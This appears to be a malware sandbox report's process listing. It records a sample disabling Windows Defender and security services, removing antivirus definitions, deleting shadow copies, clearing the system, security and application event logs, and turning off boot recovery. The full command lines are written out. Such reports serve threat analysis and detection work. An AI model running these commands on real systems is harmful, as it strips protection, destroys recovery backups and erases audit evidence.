C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2304
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3476

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
- Modifies Windows Defender Real-time Protection settings
PID:1140

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
- Modifies Windows Defender Real-time Protection settings
PID:4968

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
- Modifies Windows Defender Real-time Protection settings
PID:4028

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
PID:4856

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
PID:1592

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
PID:4704

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
PID:836

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
PID:2364

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
PID:4208

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
PID:4792

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
PID:1704

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
PID:4460

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
PID:1368

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
PID:2908

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
PID:2080

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
PID:2148

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
PID:868

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
PID:4592

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
PID:2436

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
PID:4416

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
PID:2796

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
PID:2900

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
PID:3568

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
PID:3832

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- Modifies security service
PID:4472

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
PID:4200

C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
- Interacts with shadow copies
PID:3964

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4252

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3572

C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
- Suspicious use of AdjustPrivilegeToken
PID:1872

C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
- Suspicious use of AdjustPrivilegeToken
PID:2960

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- Modifies boot configuration data using bcdedit
PID:2052

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
- Modifies boot configuration data using bcdedit
PID:4392

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
PID:2812

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
PID:4420

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIOAVProtection $true
  - Suspicious behavior: EnumeratesProcesses
  PID:228

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
PID:1208

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableRealtimeMonitoring $true
  - Suspicious behavior: EnumeratesProcesses
  PID:1956

Network
MITRE ATT&CK Enterprise v15
Downloads